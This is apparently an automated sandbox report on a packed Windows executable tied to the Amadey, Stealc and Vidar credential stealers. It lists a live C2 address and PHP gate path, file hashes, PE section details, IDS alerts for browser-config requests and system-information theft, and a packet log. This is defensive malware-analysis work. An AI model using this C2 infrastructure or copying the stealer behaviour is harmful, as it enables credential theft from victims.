              206894WHOLESALECONNECTIONSNLtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1502482
              Start date and time:2024-09-01 20:53:07 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 14s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@2/6@0/1
              EGA Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 20.189.173.20
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target file.exe, PID 3424 because there are no executed function
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              14:54:25API Interceptor140783x Sleep call for process: file.exe modified
              14:55:14API Interceptor1x Sleep call for process: WerFault.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.215.113.100file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadeyBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadeyBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              No context
              No context
              Process:C:\Users\user\Desktop\file.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
              Category:dropped
              Size (bytes):20480
              Entropy (8bit):0.8439810553697228
              Encrypted:false
              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
              Malicious:false
              Reputation:high, very likely benign file
              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.9715733055531203
              Encrypted:false
              SSDEEP:192:WhsHhjvnPlD0BU/7E3juCZr+dqWzuiFqZ24IO8ThB:NnNwBU/AjWXzuiFqY4IO8r
              MD5:CD33BF2695AD4D6F68E0A5B710F0121C
              SHA1:2A4D97D8C758C386CE70ACC9753CC044FD29CFA5
              SHA-256:135D04A927E896A01B43D7B4CD4675DAFB00007BEC9001EDBBDB43103EF0CF7B
              SHA-512:A13B8394A507F49829EB1891196BC88FDDB384E1DB732622992D836EFC1BD4383C1A89A355FFF45012FD8F6FD8A9D040FFDAA916E185CDCA18569041618174A4
              Malicious:true
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.6.9.0.4.9.9.1.6.6.6.1.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.6.9.0.4.9.9.7.1.3.4.9.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.b.d.1.5.c.a.-.e.e.b.6.-.4.1.2.1.-.8.b.a.8.-.a.2.4.a.9.2.4.9.6.1.3.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.7.0.6.2.0.a.-.f.d.9.1.-.4.2.5.6.-.b.d.1.d.-.3.f.9.8.1.7.5.a.b.0.3.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.6.0.-.0.0.0.1.-.0.0.1.4.-.8.0.0.5.-.1.1.4.b.a.0.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.2.8.b.b.b.6.b.f.1.2.5.8.4.e.d.a.0.e.0.d.9.c.7.b.a.8.4.5.1.e.7.9.2.e.0.8.5.0.7.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Sun Sep 1 18:54:59 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):285582
              Entropy (8bit):1.3620113564109735
              Encrypted:false
              SSDEEP:384:A/gNeEdU8kkcoVPrTX3Cnl9XkxJUYhVVLB:2gNeEdgP6/wpeB
              MD5:FBB1280DBDB1DE3E5BF89987B89DACF4
              SHA1:D505179920528E1385839D84F9B2123515FB2B6D
              SHA-256:9B2E375425228449D9D4F4BA3C2D195E9447E9B47B1C053031822D3DF4CA34A5
              SHA-512:13617F989EA854485A6DB13B4147C56D50B16F30C18252BAAF6D04D91A49774B64C43548C41281066D459CAC69816D31FA964F16BB3759646F7E6716C8168B41
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... ..........f............d...........`...l.......4...2...........T.......8...........T............<...............#...........%..............................................................................eJ......P&......GenuineIntel............T.......`...B..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8374
              Entropy (8bit):3.6992016403699743
              Encrypted:false
              SSDEEP:192:R6l7wVeJjCI6r6YEIHSU92gmfBtmprP89bCzsf7Wm:R6lXJ56r6YEISU92gmfbrCYfz
              MD5:1EB72782CF2281B1C70BFD2C76E334A3
              SHA1:2FC68CD52E0D06DBE466FD00B80AAFC4F160BBBA
              SHA-256:1032FB87514C28B0F79D90315299EF6DBC81698CC3D51FB0D15BF9FED21D07E3
              SHA-512:D8564377F4B1369D5C68A49EA5A9F312E81AC8632B53A9875866A409B2380C5331651CDAF0C7DEF3833A39AB39B30BDD6D994F47BF46DC4444D1712F5B377440
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.2.4.<./.P.i.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4594
              Entropy (8bit):4.469461811840022
              Encrypted:false
              SSDEEP:48:cvIwWl8zs8NJg77aI9JWWpW8VYjYm8M4JIgFw+q8jH2uHUd:uIjf8nI7j37VjJUw2uHUd
              MD5:451847B97FF6478F7B3B977B51690534
              SHA1:53CA07AA77BAFF9A61820AD4079F07B44DFB0C00
              SHA-256:3C00F738F50C4C46205660070C60B3E4D602B190F1870BC78184908C70C7740A
              SHA-512:3B526E02BABF31BB63B05A6BE937F33636A3B66F8C5262491AD6900FFD259766FDE39F13BF38DCCDDA7DD2FCC16F0E2D9A0B9A39DCBD47DD2BF6A669ED60FD53
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="481557" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.421341949076065
              Encrypted:false
              SSDEEP:6144:0Svfpi6ceLP/9skLmb0OTKWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw9:/vloTKW+EZMM6DFy403w9
              MD5:1B2CA34B23C318335104C5747589062C
              SHA1:6F038B24D81A0DE780D8B9517605A78C6C94CF35
              SHA-256:399D131B58BFC87F858EE57031A9FD1929035DB599501CB54F7C608BFEECFBA6
              SHA-512:95F141FED65785D6A4D8B97797B9DA7CB6DC009DF65B331D992083E4F61AC31B67CBECBBB5B152EC2DADCD7A5CC59CDFE22DEA81B4A57BB72E2651BC732B2F45
              Malicious:false
              Reputation:low
              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..q..................................................................................................................................................................................................................................................................................................................................................E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.946015742389872
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:file.exe
              File size:1'751'552 bytes
              MD5:e327e97714aa25537fde40f3c48efde7
              SHA1:428bbb6bf12584eda0e0d9c7ba8451e792e08507
              SHA256:2d4680a8ec9567082b77baef594ca11f2a509c4bae189a239855e00d357c7a34
              SHA512:786d9fc5f79a180eb94353cacc9e2eacf12c25d41634807abd9fb161dda33112e7847ceef0b6ca6d884886c1065fbf27f3ae6a6161d10329d9c0b4722b23706e
              SSDEEP:49152:5yuGkFQgUAXfRldRSNc67YugyTIbuna1e:IBkFQW5RJu6unaQ
              TLSH:E58533BA1E93CCA5C5ED0573621338D4F9BCB1B5C7F69D194320E9A2B1337902E6E846
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........
              Icon Hash:00928e8e8686b000
              Entrypoint:0xa6c000
              Entrypoint Section:.taggant
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
              Time Stamp:0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:2eabe9054cad5152567f0699947a2c5b
              Instruction
              jmp 00007F56ACBEEEAAh
              sets byte ptr [edx]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add cl, ch
              add byte ptr [eax], ah
              add byte ptr [eax], al
              add byte ptr [edx+ecx], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              adc byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              pop es
              or al, byte ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [edx+ecx], al
              add byte ptr [eax], al
              pop es
              or al, byte ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [ecx+00000080h], dh
              add byte ptr [eax], al
              add byte ptr [eax], dh
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax+eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              Programming Language:
              • [C++] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [ C ] VS2008 SP1 build 30729
              • [IMP] VS2008 SP1 build 30729
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x23f0500x64.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x23f1f80x8.idata
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              0x10000x23d0000x13c00cc35f48825b052cce0bf6aa8fbba089eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc 0x23e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata 0x23f0000x10000x200380655991303f284fcb90ef8e49522a1False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              0x2400000x2960000x200b1992176c4c63f7239c618a27705dd19unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              pxgxvnlp0x4d60000x1950000x1944004df14749b91613cc7afd0c654dc9612cFalse0.9949553329854669data7.954604201720513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              bshzvtbg0x66b0000x10000x4003bc0dfa6a2cd55c4c0817bad7b5fac1eFalse0.794921875data6.15438558092018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .taggant0x66c0000x30000x220071eaf5d08437f8d06b758aefacab3fbfFalse0.0646829044117647DOS executable (COM)0.6949661970386583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              DLLImport
              kernel32.dlllstrcpy
              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
              2024-09-01T20:54:06.895741+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34970480192.168.2.5185.215.113.100
              2024-09-01T20:54:06.322810+0200TCP2044248ET MALWARE Win32/Stealc Submitting System Information to C214970480192.168.2.5185.215.113.100
              2024-09-01T20:53:59.714165+0200TCP2044244ET MALWARE Win32/Stealc Requesting browsers Config from C214970480192.168.2.5185.215.113.100
              2024-09-01T20:54:03.639606+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config18049704185.215.113.100192.168.2.5
              2024-09-01T20:54:00.006452+0200TCP2044246ET MALWARE Win32/Stealc Requesting plugins Config from C214970480192.168.2.5185.215.113.100
              2024-09-01T20:53:59.416144+0200TCP2044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in14970480192.168.2.5185.215.113.100
              2024-09-01T20:53:59.720314+0200TCP2044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config18049704185.215.113.100192.168.2.5
              TimestampSource PortDest PortSource IPDest IP
              Sep 1, 2024 20:53:58.230026960 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:58.234951019 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:58.235033989 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:58.237189054 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:58.243938923 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.091248035 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.091322899 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.094611883 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.099858046 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.416059971 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.416143894 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.418201923 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.432555914 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.713977098 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.714000940 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:53:59.714164972 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.714164972 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.715400934 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:53:59.720314026 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:00.006369114 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:00.006382942 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:00.006452084 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.198895931 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.198987007 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.199033022 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.199073076 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.398574114 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.398598909 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.398610115 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.398644924 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.398668051 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.602771997 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.602945089 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.602991104 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.603095055 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.634809017 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.639605999 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.914266109 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.914448023 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.993865967 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.993901968 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:03.998739958 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.998791933 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.998801947 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.999023914 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.999033928 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:03.999114037 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.322704077 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.322809935 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.598507881 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.604265928 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.895553112 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.895721912 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.895740986 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.895791054 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.895798922 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.895848036 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.895957947 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.896003962 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.896661043 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.896672010 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.896713018 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.896897078 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.896909952 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.896919966 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:06.896945953 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:06.896975040 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:07.098506927 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.098606110 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:07.098615885 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.098628044 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.098675013 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:07.098897934 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.098911047 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.098921061 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.098949909 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:07.098977089 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:07.099453926 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.099513054 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:07.099714994 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:07.099730015 CEST8049704185.215.113.100192.168.2.5
